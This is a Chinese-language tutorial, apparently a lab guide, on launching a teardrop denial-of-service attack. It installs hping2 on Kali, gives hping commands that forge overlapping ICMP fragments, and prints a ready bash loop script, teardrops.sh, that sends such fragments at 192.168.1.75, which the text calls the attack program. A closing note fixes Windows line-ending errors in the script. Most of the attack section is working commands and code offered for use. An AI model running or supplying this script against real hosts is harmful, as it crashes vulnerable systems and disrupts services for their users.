泪滴攻击

teardrops(泪滴攻击)

  • 用ssh把hping2.0.0-rc3.tar.gz上传到kali的 /usr/local目录下

  • 进入/usr/local目录并查看其下面的文件

  • 利用tar –zxvf hping2.0.0-rc3.tar.gz命令解压缩。

  • 进入 /usr/loca/hping2-rc3/ 目录

  • 利用./configure命令进行配置,最下端有提示你用make命令进行编译

    • 在redhat下可能会没有gcc,会出现 cc:command not foud错误 ,此时需要安装gcc
  • 没有错误可以进行编译,输入make命令进行编译;会看到两项提示的配置。

  • 按照提示以此运行,make strip 和make install 安装
  • 利用命令 hping2 –h 查看hping2的命令帮助,关于hping2的安装与查看部分就完成了

  • 构造两个重叠便宜的IP分片

    • ./hping 192.168.1.1 -1 –x –d 1000 –N 100 –c 1
    • ./hping 192.168.1.1 -1 –d 200 –g 400 –N 100 –c 1
    • //构造了两个ICMP请求ip包分片,第一个载荷量1000,标识100,第二个载荷量200标识100,但本应偏移量为1008,可他却设置了400,这样在分片重组时就会重叠,老的Linux内核(1.x - 2.0.x)在处理这种重叠分片的时候存在问题,WinNT/95在接收到10至50个teardrop分片时也会崩溃。。如果将向上述命令写入脚本,并用循环语句,持续发送,就成了发送泪滴攻击的攻击程序了。
  • 在桌面上已经有写好的泪滴攻击程序,用 cat teardrops.sh 命令查看程序内容,如果需要修改目标主机IP,
    用命令vi teardrops.sh进行编辑

    • teardrops.sh脚本:

        #!/bin/bash
        for((i=100;i<150;i++))
        do
        hping 192.168.1.75 -1 -x -d 1000 -N $i -c 1
        hping 192.168.1.75 -1 -d 200 -g 400 -N $i -c 1
        done
      
  • 利用命令.teardrops.sh执行脚本,若出现没有权限的字符,利用命令chmod 755 teardrops.sh提高权限,若出现v/bin/sh^M:bad interpreter:NO such file ordirectory,请查看下面的注释一。

  • 重新执行teardrops.sh脚本就实现了泪滴攻击


注释一

在Linux中执行.sh脚本,异常/bin/sh^M: bad interpreter: No such file or directory。

分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。

解决:1)在windows下转换:

利用一些编辑器如UltraEdit或EditPlus等工具先将脚本编码转换,再放到Linux中执行。转换方式如下(UltraEdit):File-->Conversions-->DOS->UNIX即可。

2)也可在Linux中转换:

  • 首先要确保文件有可执行权限
  • sh>chmod a+x filename
  • 然后修改文件格式
  • sh>vi filename
  • 利用如下命令查看文件格式
  • :set ff 或 :set fileformat
  • 可以看到如下信息
    • fileformat=dos 或 fileformat=unix
  • 利用如下命令修改文件格式
  • :set ff=unix 或 :set fileformat=unix
  • :wq (存盘退出)
  • 最后再执行文件
  • sh>./filename

你可能感兴趣的:(泪滴攻击)